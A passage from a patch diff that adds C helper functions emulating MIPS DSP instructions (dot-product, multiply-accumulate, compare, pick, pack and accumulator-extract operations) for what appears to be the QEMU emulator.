1; \ + } \ + temp[0] = temp_sum; \ + temp[1] = acc[1] - temp[1]; \ + } \ + \ + env->active_tc.HI[ac] = temp[1]; \ + env->active_tc.LO[ac] = temp[0]; \ +} + +DP_OB(dpau_h_obl, 1, 56, 48, 40, 32, 56, 48, 40, 32); +DP_OB(dpau_h_obr, 1, 24, 16, 8, 0, 24, 16, 8, 0); +DP_OB(dpsu_h_obl, 0, 56, 48, 40, 32, 56, 48, 40, 32); +DP_OB(dpsu_h_obr, 0, 24, 16, 8, 0, 24, 16, 8, 0); + +#undef DP_OB +#endif + +#define DP_NOFUNC_PH(name, is_add, rsmov1, rsmov2, rtmov1, rtmov2) \ +void helper_##name(uint32_t ac, target_ulong rs, target_ulong rt, \ + CPUMIPSState *env) \ +{ \ + int16_t rsB, rsA, rtB, rtA; \ + int32_t tempA, tempB; \ + int64_t acc; \ + \ + rsB = (rs >> rsmov1) & MIPSDSP_LO; \ + rsA = (rs >> rsmov2) & MIPSDSP_LO; \ + rtB = (rt >> rtmov1) & MIPSDSP_LO; \ + rtA = (rt >> rtmov2) & MIPSDSP_LO; \ + \ + tempB = (int32_t)rsB * (int32_t)rtB; \ + tempA = (int32_t)rsA * (int32_t)rtA; \ + \ + acc = ((uint64_t)env->active_tc.HI[ac] << 32) | \ + ((uint64_t)env->active_tc.LO[ac] & MIPSDSP_LLO); \ + \ + if (is_add) { \ + acc = acc + ((int64_t)tempB + (int64_t)tempA); \ + } else { \ + acc = acc - ((int64_t)tempB + (int64_t)tempA); \ + } \ + \ + env->active_tc.HI[ac] = (target_long)(int32_t)((acc & MIPSDSP_LHI) >> 32); \ + env->active_tc.LO[ac] = (target_long)(int32_t)(acc & MIPSDSP_LLO); \ +} + +DP_NOFUNC_PH(dpa_w_ph, 1, 16, 0, 16, 0); +DP_NOFUNC_PH(dpax_w_ph, 1, 16, 0, 0, 16); +DP_NOFUNC_PH(dps_w_ph, 0, 16, 0, 16, 0); +DP_NOFUNC_PH(dpsx_w_ph, 0, 16, 0, 0, 16); +#undef DP_NOFUNC_PH + +#define DP_HASFUNC_PH(name, is_add, rsmov1, rsmov2, rtmov1, rtmov2) \ +void helper_##name(uint32_t ac, target_ulong rs, target_ulong rt, \ + CPUMIPSState *env) \ +{ \ + int16_t rsB, rsA, rtB, rtA; \ + int32_t tempB, tempA; \ + int64_t acc, dotp; \ + \ + rsB = (rs >> rsmov1) & MIPSDSP_LO; \ + rsA = (rs >> rsmov2) & MIPSDSP_LO; \ + rtB = (rt >> rtmov1) & MIPSDSP_LO; \ + rtA = (rt >> rtmov2) & MIPSDSP_LO; \ + \ + tempB = mipsdsp_mul_q15_q15(ac, rsB, rtB, env); \ + tempA = mipsdsp_mul_q15_q15(ac, rsA, rtA, env); \ + \ + dotp = (int64_t)tempB + (int64_t)tempA; \ + acc = ((uint64_t)env->active_tc.HI[ac] << 32) | \ + ((uint64_t)env->active_tc.LO[ac] & MIPSDSP_LLO); \ + \ + if (is_add) { \ + acc = acc + dotp; \ + } else { \ + acc = acc - dotp; \ + } \ + \ + env->active_tc.HI[ac] = (target_long)(int32_t) \ + ((acc & MIPSDSP_LHI) >> 32); \ + env->active_tc.LO[ac] = (target_long)(int32_t) \ + (acc & MIPSDSP_LLO); \ +} + +DP_HASFUNC_PH(dpaq_s_w_ph, 1, 16, 0, 16, 0); +DP_HASFUNC_PH(dpaqx_s_w_ph, 1, 16, 0, 0, 16); +DP_HASFUNC_PH(dpsq_s_w_ph, 0, 16, 0, 16, 0); +DP_HASFUNC_PH(dpsqx_s_w_ph, 0, 16, 0, 0, 16); + +#undef DP_HASFUNC_PH + +#define DP_128OPERATION_PH(name, is_add) \ +void helper_##name(uint32_t ac, target_ulong rs, target_ulong rt, \ + CPUMIPSState *env) \ +{ \ + int16_t rsh, rsl, rth, rtl; \ + int32_t tempB, tempA, tempC62_31, tempC63; \ + int64_t acc, dotp, tempC; \ + \ + MIPSDSP_SPLIT32_16(rs, rsh, rsl); \ + MIPSDSP_SPLIT32_16(rt, rth, rtl); \ + \ + tempB = mipsdsp_mul_q15_q15(ac, rsh, rtl, env); \ + tempA = mipsdsp_mul_q15_q15(ac, rsl, rth, env); \ + \ + dotp = (int64_t)tempB + (int64_t)tempA; \ + acc = ((uint64_t)env->active_tc.HI[ac] << 32) | \ + ((uint64_t)env->active_tc.LO[ac] & MIPSDSP_LLO); \ + if (is_add) { \ + tempC = acc + dotp; \ + } else { \ + tempC = acc - dotp; \ + } \ + tempC63 = (tempC >> 63) & 0x01; \ + tempC62_31 = (tempC >> 31) & 0xFFFFFFFF; \ + \ + if ((tempC63 == 0) && (tempC62_31 != 0x00000000)) { \ + tempC = 0x7FFFFFFF; \ + set_DSPControl_overflow_flag(1, 16 + ac, env); \ + } \ + \ + if ((tempC63 == 1) && (tempC62_31 != 0xFFFFFFFF)) { \ + tempC = (int64_t)(int32_t)0x80000000; \ + set_DSPControl_overflow_flag(1, 16 + ac, env); \ + } \ + \ + env->active_tc.HI[ac] = (target_long)(int32_t) \ + ((tempC & MIPSDSP_LHI) >> 32); \ + env->active_tc.LO[ac] = (target_long)(int32_t) \ + (tempC & MIPSDSP_LLO); \ +} + +DP_128OPERATION_PH(dpaqx_sa_w_ph, 1); +DP_128OPERATION_PH(dpsqx_sa_w_ph, 0); + +#undef DP_128OPERATION_HP + +#if defined(TARGET_MIPS64) +#define DP_QH(name, is_add, use_ac_env) \ +void helper_##name(target_ulong rs, target_ulong rt, uint32_t ac, \ + CPUMIPSState *env) \ +{ \ + int32_t rs3, rs2, rs1, rs0; \ + int32_t rt3, rt2, rt1, rt0; \ + int32_t tempD, tempC, tempB, tempA; \ + int64_t acc[2]; \ + int64_t temp[2]; \ + int64_t temp_sum; \ + \ + MIPSDSP_SPLIT64_16(rs, rs3, rs2, rs1, rs0); \ + MIPSDSP_SPLIT64_16(rt, rt3, rt2, rt1, rt0); \ + \ + if (use_ac_env) { \ + tempD = mipsdsp_mul_q15_q15(ac, rs3, rt3, env); \ + tempC = mipsdsp_mul_q15_q15(ac, rs2, rt2, env); \ + tempB = mipsdsp_mul_q15_q15(ac, rs1, rt1, env); \ + tempA = mipsdsp_mul_q15_q15(ac, rs0, rt0, env); \ + } else { \ + tempD = mipsdsp_mul_u16_u16(rs3, rt3); \ + tempC = mipsdsp_mul_u16_u16(rs2, rt2); \ + tempB = mipsdsp_mul_u16_u16(rs1, rt1); \ + tempA = mipsdsp_mul_u16_u16(rs0, rt0); \ + } \ + \ + temp[0] = (int64_t)tempD + (int64_t)tempC + \ + (int64_t)tempB + (int64_t)tempA; \ + \ + if (temp[0] >= 0) { \ + temp[1] = 0; \ + } else { \ + temp[1] = ~0ull; \ + } \ + \ + acc[1] = env->active_tc.HI[ac]; \ + acc[0] = env->active_tc.LO[ac]; \ + \ + if (is_add) { \ + temp_sum = acc[0] + temp[0]; \ + if (((uint64_t)temp_sum < (uint64_t)acc[0]) && \ + ((uint64_t)temp_sum < (uint64_t)temp[0])) { \ + acc[1] = acc[1] + 1; \ + } \ + temp[0] = temp_sum; \ + temp[1] = acc[1] + temp[1]; \ + } else { \ + temp_sum = acc[0] - temp[0]; \ + if ((uint64_t)temp_sum > (uint64_t)acc[0]) { \ + acc[1] = acc[1] - 1; \ + } \ + temp[0] = temp_sum; \ + temp[1] = acc[1] - temp[1]; \ + } \ + \ + env->active_tc.HI[ac] = temp[1]; \ + env->active_tc.LO[ac] = temp[0]; \ +} + +DP_QH(dpa_w_qh, 1, 0); +DP_QH(dpaq_s_w_qh, 1, 1); +DP_QH(dps_w_qh, 0, 0); +DP_QH(dpsq_s_w_qh, 0, 1); + +#undef DP_QH + +#endif + +#define DP_L_W(name, is_add) \ +void helper_##name(uint32_t ac, target_ulong rs, target_ulong rt, \ + CPUMIPSState *env) \ +{ \ + int32_t temp63; \ + int64_t dotp, acc; \ + uint64_t temp; \ + bool overflow; \ + \ + dotp = mipsdsp_mul_q31_q31(ac, rs, rt, env); \ + acc = ((uint64_t)env->active_tc.HI[ac] << 32) | \ + ((uint64_t)env->active_tc.LO[ac] & MIPSDSP_LLO); \ + if (is_add) { \ + temp = acc + dotp; \ + overflow = MIPSDSP_OVERFLOW_ADD((uint64_t)acc, (uint64_t)dotp, \ + temp, (0x01ull << 63)); \ + } else { \ + temp = acc - dotp; \ + overflow = MIPSDSP_OVERFLOW_SUB((uint64_t)acc, (uint64_t)dotp, \ + temp, (0x01ull << 63)); \ + } \ + \ + if (overflow) { \ + temp63 = (temp >> 63) & 0x01; \ + if (temp63 == 1) { \ + temp = (0x01ull << 63) - 1; \ + } else { \ + temp = 0x01ull << 63; \ + } \ + \ + set_DSPControl_overflow_flag(1, 16 + ac, env); \ + } \ + \ + env->active_tc.HI[ac] = (target_long)(int32_t) \ + ((temp & MIPSDSP_LHI) >> 32); \ + env->active_tc.LO[ac] = (target_long)(int32_t) \ + (temp & MIPSDSP_LLO); \ +} + +DP_L_W(dpaq_sa_l_w, 1); +DP_L_W(dpsq_sa_l_w, 0); + +#undef DP_L_W + +#if defined(TARGET_MIPS64) +#define DP_L_PW(name, func) \ +void helper_##name(target_ulong rs, target_ulong rt, uint32_t ac, \ + CPUMIPSState *env) \ +{ \ + int32_t rs1, rs0; \ + int32_t rt1, rt0; \ + int64_t tempB[2], tempA[2]; \ + int64_t temp[2]; \ + int64_t acc[2]; \ + int64_t temp_sum; \ + \ + temp[0] = 0; \ + temp[1] = 0; \ + \ + MIPSDSP_SPLIT64_32(rs, rs1, rs0); \ + MIPSDSP_SPLIT64_32(rt, rt1, rt0); \ + \ + tempB[0] = mipsdsp_mul_q31_q31(ac, rs1, rt1, env); \ + tempA[0] = mipsdsp_mul_q31_q31(ac, rs0, rt0, env); \ + \ + if (tempB[0] >= 0) { \ + tempB[1] = 0x00; \ + } else { \ + tempB[1] = ~0ull; \ + } \ + \ + if (tempA[0] >= 0) { \ + tempA[1] = 0x00; \ + } else { \ + tempA[1] = ~0ull; \ + } \ + \ + temp_sum = tempB[0] + tempA[0]; \ + if (((uint64_t)temp_sum < (uint64_t)tempB[0]) && \ + ((uint64_t)temp_sum < (uint64_t)tempA[0])) { \ + temp[1] += 1; \ + } \ + temp[0] = temp_sum; \ + temp[1] += tempB[1] + tempA[1]; \ + \ + mipsdsp_##func(acc, ac, temp, env); \ + \ + env->active_tc.HI[ac] = acc[1]; \ + env->active_tc.LO[ac] = acc[0]; \ +} + +DP_L_PW(dpaq_sa_l_pw, sat64_acc_add_q63); +DP_L_PW(dpsq_sa_l_pw, sat64_acc_sub_q63); + +#undef DP_L_PW + +void helper_mulsaq_s_l_pw(target_ulong rs, target_ulong rt, uint32_t ac, + CPUMIPSState *env) +{ + int32_t rs1, rs0; + int32_t rt1, rt0; + int64_t tempB[2], tempA[2]; + int64_t temp[2]; + int64_t acc[2]; + int64_t temp_sum; + + rs1 = (rs >> 32) & MIPSDSP_LLO; + rs0 = rs & MIPSDSP_LLO; + rt1 = (rt >> 32) & MIPSDSP_LLO; + rt0 = rt & MIPSDSP_LLO; + + tempB[0] = mipsdsp_mul_q31_q31(ac, rs1, rt1, env); + tempA[0] = mipsdsp_mul_q31_q31(ac, rs0, rt0, env); + + if (tempB[0] >= 0) { + tempB[1] = 0x00; + } else { + tempB[1] = ~0ull; + } + + if (tempA[0] >= 0) { + tempA[1] = 0x00; + } else { + tempA[1] = ~0ull; + } + + acc[0] = env->active_tc.LO[ac]; + acc[1] = env->active_tc.HI[ac]; + + temp_sum = tempB[0] - tempA[0]; + if ((uint64_t)temp_sum > (uint64_t)tempB[0]) { + tempB[1] -= 1; + } + temp[0] = temp_sum; + temp[1] = tempB[1] - tempA[1]; + + if ((temp[1] & 0x01) == 0) { + temp[1] = 0x00; + } else { + temp[1] = ~0ull; + } + + temp_sum = acc[0] + temp[0]; + if (((uint64_t)temp_sum < (uint64_t)acc[0]) && + ((uint64_t)temp_sum < (uint64_t)temp[0])) { + acc[1] += 1; + } + acc[0] = temp_sum; + acc[1] += temp[1]; + + env->active_tc.HI[ac] = acc[1]; + env->active_tc.LO[ac] = acc[0]; +} +#endif + +#define MAQ_S_W(name, mov) \ +void helper_##name(uint32_t ac, target_ulong rs, target_ulong rt, \ + CPUMIPSState *env) \ +{ \ + int16_t rsh, rth; \ + int32_t tempA; \ + int64_t tempL, acc; \ + \ + rsh = (rs >> mov) & MIPSDSP_LO; \ + rth = (rt >> mov) & MIPSDSP_LO; \ + tempA = mipsdsp_mul_q15_q15(ac, rsh, rth, env); \ + acc = ((uint64_t)env->active_tc.HI[ac] << 32) | \ + ((uint64_t)env->active_tc.LO[ac] & MIPSDSP_LLO); \ + tempL = (int64_t)tempA + acc; \ + env->active_tc.HI[ac] = (target_long)(int32_t) \ + ((tempL & MIPSDSP_LHI) >> 32); \ + env->active_tc.LO[ac] = (target_long)(int32_t) \ + (tempL & MIPSDSP_LLO); \ +} + +MAQ_S_W(maq_s_w_phl, 16); +MAQ_S_W(maq_s_w_phr, 0); + +#undef MAQ_S_W + +#define MAQ_SA_W(name, mov) \ +void helper_##name(uint32_t ac, target_ulong rs, target_ulong rt, \ + CPUMIPSState *env) \ +{ \ + int16_t rsh, rth; \ + int32_t tempA; \ + \ + rsh = (rs >> mov) & MIPSDSP_LO; \ + rth = (rt >> mov) & MIPSDSP_LO; \ + tempA = mipsdsp_mul_q15_q15(ac, rsh, rth, env); \ + tempA = mipsdsp_sat32_acc_q31(ac, tempA, env); \ + \ + env->active_tc.HI[ac] = (target_long)(int32_t)(((int64_t)tempA & \ + MIPSDSP_LHI) >> 32); \ + env->active_tc.LO[ac] = (target_long)(int32_t)((int64_t)tempA & \ + MIPSDSP_LLO); \ +} + +MAQ_SA_W(maq_sa_w_phl, 16); +MAQ_SA_W(maq_sa_w_phr, 0); + +#undef MAQ_SA_W + +#define MULQ_W(name, addvar) \ +target_ulong helper_##name(target_ulong rs, target_ulong rt, \ + CPUMIPSState *env) \ +{ \ + int32_t rs_t, rt_t; \ + int32_t tempI; \ + int64_t tempL; \ + \ + rs_t = rs & MIPSDSP_LLO; \ + rt_t = rt & MIPSDSP_LLO; \ + \ + if ((rs_t == 0x80000000) && (rt_t == 0x80000000)) { \ + tempL = 0x7FFFFFFF00000000ull; \ + set_DSPControl_overflow_flag(1, 21, env); \ + } else { \ + tempL = ((int64_t)rs_t * (int64_t)rt_t) << 1; \ + tempL += addvar; \ + } \ + tempI = (tempL & MIPSDSP_LHI) >> 32; \ + \ + return (target_long)(int32_t)tempI; \ +} + +MULQ_W(mulq_s_w, 0); +MULQ_W(mulq_rs_w, 0x80000000ull); + +#undef MULQ_W + +#if defined(TARGET_MIPS64) + +#define MAQ_S_W_QH(name, mov) \ +void helper_##name(target_ulong rs, target_ulong rt, uint32_t ac, \ + CPUMIPSState *env) \ +{ \ + int16_t rs_t, rt_t; \ + int32_t temp_mul; \ + int64_t temp[2]; \ + int64_t acc[2]; \ + int64_t temp_sum; \ + \ + temp[0] = 0; \ + temp[1] = 0; \ + \ + rs_t = (rs >> mov) & MIPSDSP_LO; \ + rt_t = (rt >> mov) & MIPSDSP_LO; \ + temp_mul = mipsdsp_mul_q15_q15(ac, rs_t, rt_t, env); \ + \ + temp[0] = (int64_t)temp_mul; \ + if (temp[0] >= 0) { \ + temp[1] = 0x00; \ + } else { \ + temp[1] = ~0ull; \ + } \ + \ + acc[0] = env->active_tc.LO[ac]; \ + acc[1] = env->active_tc.HI[ac]; \ + \ + temp_sum = acc[0] + temp[0]; \ + if (((uint64_t)temp_sum < (uint64_t)acc[0]) && \ + ((uint64_t)temp_sum < (uint64_t)temp[0])) { \ + acc[1] += 1; \ + } \ + acc[0] = temp_sum; \ + acc[1] += temp[1]; \ + \ + env->active_tc.HI[ac] = acc[1]; \ + env->active_tc.LO[ac] = acc[0]; \ +} + +MAQ_S_W_QH(maq_s_w_qhll, 48); +MAQ_S_W_QH(maq_s_w_qhlr, 32); +MAQ_S_W_QH(maq_s_w_qhrl, 16); +MAQ_S_W_QH(maq_s_w_qhrr, 0); + +#undef MAQ_S_W_QH + +#define MAQ_SA_W(name, mov) \ +void helper_##name(target_ulong rs, target_ulong rt, uint32_t ac, \ + CPUMIPSState *env) \ +{ \ + int16_t rs_t, rt_t; \ + int32_t temp; \ + int64_t acc[2]; \ + \ + rs_t = (rs >> mov) & MIPSDSP_LO; \ + rt_t = (rt >> mov) & MIPSDSP_LO; \ + temp = mipsdsp_mul_q15_q15(ac, rs_t, rt_t, env); \ + temp = mipsdsp_sat32_acc_q31(ac, temp, env); \ + \ + acc[0] = (int64_t)(int32_t)temp; \ + if (acc[0] >= 0) { \ + acc[1] = 0x00; \ + } else { \ + acc[1] = ~0ull; \ + } \ + \ + env->active_tc.HI[ac] = acc[1]; \ + env->active_tc.LO[ac] = acc[0]; \ +} + +MAQ_SA_W(maq_sa_w_qhll, 48); +MAQ_SA_W(maq_sa_w_qhlr, 32); +MAQ_SA_W(maq_sa_w_qhrl, 16); +MAQ_SA_W(maq_sa_w_qhrr, 0); + +#undef MAQ_SA_W + +#define MAQ_S_L_PW(name, mov) \ +void helper_##name(target_ulong rs, target_ulong rt, uint32_t ac, \ + CPUMIPSState *env) \ +{ \ + int32_t rs_t, rt_t; \ + int64_t temp[2]; \ + int64_t acc[2]; \ + int64_t temp_sum; \ + \ + temp[0] = 0; \ + temp[1] = 0; \ + \ + rs_t = (rs >> mov) & MIPSDSP_LLO; \ + rt_t = (rt >> mov) & MIPSDSP_LLO; \ + \ + temp[0] = mipsdsp_mul_q31_q31(ac, rs_t, rt_t, env); \ + if (temp[0] >= 0) { \ + temp[1] = 0x00; \ + } else { \ + temp[1] = ~0ull; \ + } \ + \ + acc[0] = env->active_tc.LO[ac]; \ + acc[1] = env->active_tc.HI[ac]; \ + \ + temp_sum = acc[0] + temp[0]; \ + if (((uint64_t)temp_sum < (uint64_t)acc[0]) && \ + ((uint64_t)temp_sum < (uint64_t)temp[0])) { \ + acc[1] += 1; \ + } \ + acc[0] = temp_sum; \ + acc[1] += temp[1]; \ + \ + env->active_tc.HI[ac] = acc[1]; \ + env->active_tc.LO[ac] = acc[0]; \ +} + +MAQ_S_L_PW(maq_s_l_pwl, 32); +MAQ_S_L_PW(maq_s_l_pwr, 0); + +#undef MAQ_S_L_PW + +#define DM_OPERATE(name, func, is_add, sigext) \ +void helper_##name(target_ulong rs, target_ulong rt, uint32_t ac, \ + CPUMIPSState *env) \ +{ \ + int32_t rs1, rs0; \ + int32_t rt1, rt0; \ + int64_t tempBL[2], tempAL[2]; \ + int64_t acc[2]; \ + int64_t temp[2]; \ + int64_t temp_sum; \ + \ + temp[0] = 0x00; \ + temp[1] = 0x00; \ + \ + MIPSDSP_SPLIT64_32(rs, rs1, rs0); \ + MIPSDSP_SPLIT64_32(rt, rt1, rt0); \ + \ + if (sigext) { \ + tempBL[0] = (int64_t)mipsdsp_##func(rs1, rt1); \ + tempAL[0] = (int64_t)mipsdsp_##func(rs0, rt0); \ + \ + if (tempBL[0] >= 0) { \ + tempBL[1] = 0x0; \ + } else { \ + tempBL[1] = ~0ull; \ + } \ + \ + if (tempAL[0] >= 0) { \ + tempAL[1] = 0x0; \ + } else { \ + tempAL[1] = ~0ull; \ + } \ + } else { \ + tempBL[0] = mipsdsp_##func(rs1, rt1); \ + tempAL[0] = mipsdsp_##func(rs0, rt0); \ + tempBL[1] = 0; \ + tempAL[1] = 0; \ + } \ + \ + acc[1] = env->active_tc.HI[ac]; \ + acc[0] = env->active_tc.LO[ac]; \ + \ + temp_sum = tempBL[0] + tempAL[0]; \ + if (((uint64_t)temp_sum < (uint64_t)tempBL[0]) && \ + ((uint64_t)temp_sum < (uint64_t)tempAL[0])) { \ + temp[1] += 1; \ + } \ + temp[0] = temp_sum; \ + temp[1] += tempBL[1] + tempAL[1]; \ + \ + if (is_add) { \ + temp_sum = acc[0] + temp[0]; \ + if (((uint64_t)temp_sum < (uint64_t)acc[0]) && \ + ((uint64_t)temp_sum < (uint64_t)temp[0])) { \ + acc[1] += 1; \ + } \ + temp[0] = temp_sum; \ + temp[1] = acc[1] + temp[1]; \ + } else { \ + temp_sum = acc[0] - temp[0]; \ + if ((uint64_t)temp_sum > (uint64_t)acc[0]) { \ + acc[1] -= 1; \ + } \ + temp[0] = temp_sum; \ + temp[1] = acc[1] - temp[1]; \ + } \ + \ + env->active_tc.HI[ac] = temp[1]; \ + env->active_tc.LO[ac] = temp[0]; \ +} + +DM_OPERATE(dmadd, mul_i32_i32, 1, 1); +DM_OPERATE(dmaddu, mul_u32_u32, 1, 0); +DM_OPERATE(dmsub, mul_i32_i32, 0, 1); +DM_OPERATE(dmsubu, mul_u32_u32, 0, 0); +#undef DM_OPERATE +#endif + +/** DSP Bit/Manipulation Sub-class insns **/ +target_ulong helper_bitrev(target_ulong rt) +{ + int32_t temp; + uint32_t rd; + int i; + + temp = rt & MIPSDSP_LO; + rd = 0; + for (i = 0; i < 16; i++) { + rd = (rd << 1) | (temp & 1); + temp = temp >> 1; + } + + return (target_ulong)rd; +} + +#define BIT_INSV(name, posfilter, ret_type) \ +target_ulong helper_##name(CPUMIPSState *env, target_ulong rs, \ + target_ulong rt) \ +{ \ + uint32_t pos, size, msb, lsb; \ + uint32_t const sizefilter = 0x3F; \ + target_ulong temp; \ + target_ulong dspc; \ + \ + dspc = env->active_tc.DSPControl; \ + \ + pos = dspc & posfilter; \ + size = (dspc >> 7) & sizefilter; \ + \ + msb = pos + size - 1; \ + lsb = pos; \ + \ + if (lsb > msb || (msb > TARGET_LONG_BITS)) { \ + return rt; \ + } \ + \ + temp = deposit64(rt, pos, size, rs); \ + \ + return (target_long)(ret_type)temp; \ +} + +BIT_INSV(insv, 0x1F, int32_t); +#ifdef TARGET_MIPS64 +BIT_INSV(dinsv, 0x7F, target_long); +#endif + +#undef BIT_INSV + + +/** DSP Compare-Pick Sub-class insns **/ +#define CMP_HAS_RET(name, func, split_num, filter, bit_size) \ +target_ulong helper_##name(target_ulong rs, target_ulong rt) \ +{ \ + uint32_t rs_t, rt_t; \ + uint8_t cc; \ + uint32_t temp = 0; \ + int i; \ + \ + for (i = 0; i < split_num; i++) { \ + rs_t = (rs >> (bit_size * i)) & filter; \ + rt_t = (rt >> (bit_size * i)) & filter; \ + cc = mipsdsp_##func(rs_t, rt_t); \ + temp |= cc << i; \ + } \ + \ + return (target_ulong)temp; \ +} + +CMP_HAS_RET(cmpgu_eq_qb, cmpu_eq, 4, MIPSDSP_Q0, 8); +CMP_HAS_RET(cmpgu_lt_qb, cmpu_lt, 4, MIPSDSP_Q0, 8); +CMP_HAS_RET(cmpgu_le_qb, cmpu_le, 4, MIPSDSP_Q0, 8); + +#ifdef TARGET_MIPS64 +CMP_HAS_RET(cmpgu_eq_ob, cmpu_eq, 8, MIPSDSP_Q0, 8); +CMP_HAS_RET(cmpgu_lt_ob, cmpu_lt, 8, MIPSDSP_Q0, 8); +CMP_HAS_RET(cmpgu_le_ob, cmpu_le, 8, MIPSDSP_Q0, 8); +#endif + +#undef CMP_HAS_RET + + +#define CMP_NO_RET(name, func, split_num, filter, bit_size) \ +void helper_##name(target_ulong rs, target_ulong rt, \ + CPUMIPSState *env) \ +{ \ + int##bit_size##_t rs_t, rt_t; \ + int##bit_size##_t flag = 0; \ + int##bit_size##_t cc; \ + int i; \ + \ + for (i = 0; i < split_num; i++) { \ + rs_t = (rs >> (bit_size * i)) & filter; \ + rt_t = (rt >> (bit_size * i)) & filter; \ + \ + cc = mipsdsp_##func((int32_t)rs_t, (int32_t)rt_t); \ + flag |= cc << i; \ + } \ + \ + set_DSPControl_24(flag, split_num, env); \ +} + +CMP_NO_RET(cmpu_eq_qb, cmpu_eq, 4, MIPSDSP_Q0, 8); +CMP_NO_RET(cmpu_lt_qb, cmpu_lt, 4, MIPSDSP_Q0, 8); +CMP_NO_RET(cmpu_le_qb, cmpu_le, 4, MIPSDSP_Q0, 8); + +CMP_NO_RET(cmp_eq_ph, cmp_eq, 2, MIPSDSP_LO, 16); +CMP_NO_RET(cmp_lt_ph, cmp_lt, 2, MIPSDSP_LO, 16); +CMP_NO_RET(cmp_le_ph, cmp_le, 2, MIPSDSP_LO, 16); + +#ifdef TARGET_MIPS64 +CMP_NO_RET(cmpu_eq_ob, cmpu_eq, 8, MIPSDSP_Q0, 8); +CMP_NO_RET(cmpu_lt_ob, cmpu_lt, 8, MIPSDSP_Q0, 8); +CMP_NO_RET(cmpu_le_ob, cmpu_le, 8, MIPSDSP_Q0, 8); + +CMP_NO_RET(cmp_eq_qh, cmp_eq, 4, MIPSDSP_LO, 16); +CMP_NO_RET(cmp_lt_qh, cmp_lt, 4, MIPSDSP_LO, 16); +CMP_NO_RET(cmp_le_qh, cmp_le, 4, MIPSDSP_LO, 16); + +CMP_NO_RET(cmp_eq_pw, cmp_eq, 2, MIPSDSP_LLO, 32); +CMP_NO_RET(cmp_lt_pw, cmp_lt, 2, MIPSDSP_LLO, 32); +CMP_NO_RET(cmp_le_pw, cmp_le, 2, MIPSDSP_LLO, 32); +#endif +#undef CMP_NO_RET + +#if defined(TARGET_MIPS64) + +#define CMPGDU_OB(name) \ +target_ulong helper_cmpgdu_##name##_ob(target_ulong rs, target_ulong rt, \ + CPUMIPSState *env) \ +{ \ + int i; \ + uint8_t rs_t, rt_t; \ + uint32_t cond; \ + \ + cond = 0; \ + \ + for (i = 0; i < 8; i++) { \ + rs_t = (rs >> (8 * i)) & MIPSDSP_Q0; \ + rt_t = (rt >> (8 * i)) & MIPSDSP_Q0; \ + \ + if (mipsdsp_cmpu_##name(rs_t, rt_t)) { \ + cond |= 0x01 << i; \ + } \ + } \ + \ + set_DSPControl_24(cond, 8, env); \ + \ + return (uint64_t)cond; \ +} + +CMPGDU_OB(eq) +CMPGDU_OB(lt) +CMPGDU_OB(le) +#undef CMPGDU_OB +#endif + +#define PICK_INSN(name, split_num, filter, bit_size, ret32bit) \ +target_ulong helper_##name(target_ulong rs, target_ulong rt, \ + CPUMIPSState *env) \ +{ \ + uint32_t rs_t, rt_t; \ + uint32_t cc; \ + target_ulong dsp; \ + int i; \ + target_ulong result = 0; \ + \ + dsp = env->active_tc.DSPControl; \ + for (i = 0; i < split_num; i++) { \ + rs_t = (rs >> (bit_size * i)) & filter; \ + rt_t = (rt >> (bit_size * i)) & filter; \ + cc = (dsp >> (24 + i)) & 0x01; \ + cc = cc == 1 ? rs_t : rt_t; \ + \ + result |= (target_ulong)cc << (bit_size * i); \ + } \ + \ + if (ret32bit) { \ + result = (target_long)(int32_t)(result & MIPSDSP_LLO); \ + } \ + \ + return result; \ +} + +PICK_INSN(pick_qb, 4, MIPSDSP_Q0, 8, 1); +PICK_INSN(pick_ph, 2, MIPSDSP_LO, 16, 1); + +#ifdef TARGET_MIPS64 +PICK_INSN(pick_ob, 8, MIPSDSP_Q0, 8, 0); +PICK_INSN(pick_qh, 4, MIPSDSP_LO, 16, 0); +PICK_INSN(pick_pw, 2, MIPSDSP_LLO, 32, 0); +#endif +#undef PICK_INSN + +target_ulong helper_packrl_ph(target_ulong rs, target_ulong rt) +{ + uint32_t rsl, rth; + + rsl = rs & MIPSDSP_LO; + rth = (rt & MIPSDSP_HI) >> 16; + + return (target_long)(int32_t)((rsl << 16) | rth); +} + +#if defined(TARGET_MIPS64) +target_ulong helper_packrl_pw(target_ulong rs, target_ulong rt) +{ + uint32_t rs0, rt1; + + rs0 = rs & MIPSDSP_LLO; + rt1 = (rt >> 32) & MIPSDSP_LLO; + + return ((uint64_t)rs0 << 32) | (uint64_t)rt1; +} +#endif + +/** DSP Accumulator and DSPControl Access Sub-class insns **/ +target_ulong helper_extr_w(target_ulong ac, target_ulong shift, + CPUMIPSState *env) +{ + int32_t tempI; + int64_t tempDL[2]; + + shift = shift & 0x1F; + + mipsdsp_rndrashift_short_acc(tempDL, ac, shift, env); + if ((tempDL[1] != 0 || (tempDL[0] & MIPSDSP_LHI) != 0) && + (tempDL[1] != 1 || (tempDL[0] & MIPSDSP_LHI) != MIPSDSP_LHI)) { + set_DSPControl_overflow_flag(1, 23, env); + } + + tempI = (tempDL[0] >> 1) & MIPSDSP_LLO; + + tempDL[0] += 1; + if (tempDL[0] == 0) { + tempDL[1] += 1; + } + + if (((tempDL[1] & 0x01) != 0 || (tempDL[0] & MIPSDSP_LHI) != 0) && + ((tempDL[1] & 0x01) != 1 || (tempDL[0] & MIPSDSP_LHI) != MIPSDSP_LHI)) { + set_DSPControl_overflow_flag(1, 23, env); + } + + return (target_long)tempI; +} + +target_ulong helper_extr_r_w(target_ulong ac, target_ulong shift, + CPUMIPSState *env) +{ + int64_t tempDL[2]; + + shift = shift & 0x1F; + + mipsdsp_rndrashift_short_acc(tempDL, ac, shift, env); + if ((tempDL[1] != 0 || (tempDL[0] & MIPSDSP_LHI) != 0) && + (tempDL[1] != 1 || (tempDL[0] & MIPSDSP_LHI) != MIPSDSP_LHI)) { + set_DSPControl_overflow_flag(1, 23, env); + } + + tempDL[0] += 1; + if (tempDL[0] == 0) { + tempDL[1] += 1; + } + + if (((tempDL[1] & 0x01) != 0 || (tempDL[0] & MIPSDSP_LHI) != 0) && + ((tempDL[1] & 0x01) != 1 || (tempDL[0] & MIPSDSP_LHI) != MIPSDSP_LHI)) { + set_DSPControl_overflow_flag(1, 23, env); + } + + return (target_long)(int32_t)(tempDL[0] >> 1); +} + +target_ulong helper_extr_rs_w(target_ulong ac, target_ulong shift, + CPUMIPSState *env) +{ + int32_t tempI, temp64; + int64_t tempDL[2]; + + shift = shift & 0x1F; + + mipsdsp_rndrashift_short_acc(tempDL, ac, shift, env); + if ((tempDL[1] != 0 || (tempDL[0] & MIPSDSP_LHI) != 0) && + (tempDL[1] != 1 || (tempDL[0] & 